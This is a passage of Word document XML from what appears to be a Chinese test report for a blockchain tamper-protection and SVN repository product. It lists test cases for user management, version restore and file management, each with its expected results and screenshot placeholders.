                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="780D0678" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50D3A37D"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6233CB59" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="346948EC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26BE3470"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69EE767D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>目标主机上被保护目录的篡改操作。监控的篡改包括新增、删除、修改和移动目录或文件的4类篡改操作。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C449663" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>该模块提供了对用户通过八分量SVN区块链服务的操作日志查看功能。主要包含用户的启动/暂停SVN数据仓库保护，恢复SVN数据仓库版本，以及客户端自动同步的操作记录。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4A5344" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-b"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="57C8F478" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="461F4AE5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3988FFC5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D4141EC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53577982"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5DDD48DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B8AA2F9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="336" w:name="_Toc36487949"/>
      <w:r w:rsidRPr="00536672">
        <w:t>用户管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="336"/>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67C7D43D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="309AF2B0"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435D27AC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>用户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="75CF5459" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7826116E"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6777B107" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2053657A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DE3CF5F"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17973EDD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4840BA2E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A68ADD9"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5CE21DF8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1、停用、启用账号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A49F83" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="16B5BC65" wp14:editId="55093785">
                  <wp:extent cx="4199890" cy="1567180"/>
                  <wp:effectExtent l="0" t="0" r="16510" b="7620"/>
                  <wp:docPr id="5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pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4199890" cy="1567180"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B885E6C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>用户详情</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="699B3C69" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5DA3D86F" wp14:editId="71B30279">
                  <wp:extent cx="4195445" cy="2160905"/>
                  <wp:effectExtent l="0" t="0" r="20955" b="23495"/>
                  <wp:docPr id="5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68"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4195445" cy="2160905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="036966A2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>新建根目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D930A32" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7B72C83A" wp14:editId="7D78450A">
                  <wp:extent cx="4199255" cy="2466340"/>
                  <wp:effectExtent l="0" t="0" r="17145" b="22860"/>
                  <wp:docPr id="5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pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId69"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4199255" cy="2466340"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFB2CF5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>取消根目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AF8722C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="353EB3AE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76335963"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2AF933A3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>界面显示正常，功能测试正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="65FDEA7F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="417FEE48"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63E5125A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="591A083D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="337" w:name="_Toc36487950"/>
      <w:bookmarkStart w:id="338" w:name="_Toc36573241"/>
      <w:bookmarkStart w:id="339" w:name="_Toc36630327"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区块链代码仓库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="337"/>
      <w:bookmarkEnd w:id="338"/>
      <w:bookmarkEnd w:id="339"/>
    </w:p>
    <w:p w14:paraId="56BB00E6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="340" w:name="_Toc36487951"/>
      <w:r w:rsidRPr="00536672">
        <w:t>版本信息维护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="340"/>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3D883265" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F1E513E"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291FA1A0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>版本信息维护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="170CF5B3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D021A2B"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44B2B66B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试，恢复版本功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2B2C615A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673A8ACC"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4BEBABD8"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2AAF9E05" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="609F720A"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5FE6DA40"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09FD8719" wp14:editId="5E34844D">
                  <wp:extent cx="4201795" cy="2238375"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="22225"/>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0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2238375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="364FA35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lastRenderedPageBreak/>
              <w:t>恢复版本信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28391AA4"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1FC45CFC" wp14:editId="4B2FEF4F">
                  <wp:extent cx="4201795" cy="2241550"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="1905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1"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2241550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="31BFD29B"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查看详情，点击开始恢复</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26FF53A9"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08FC99A5" wp14:editId="5D9F10A7">
                  <wp:extent cx="4201795" cy="2338070"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="2413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2"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2338070"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C393B95" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0CD16F49" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4DE5F5"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7D7BAE0F"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color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>恢复版本成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4B0A3268" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59A7047B"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7763CF07" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="613CAB27" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="341" w:name="_Toc36487952"/>
      <w:r w:rsidRPr="00536672">
        <w:t>文件管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>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2A2EC33B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F7EDC2B"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70D15820" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>文件管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5DB49702" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F046ECC"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481B6312" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看文件目录历史版本，停用、启用文件目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
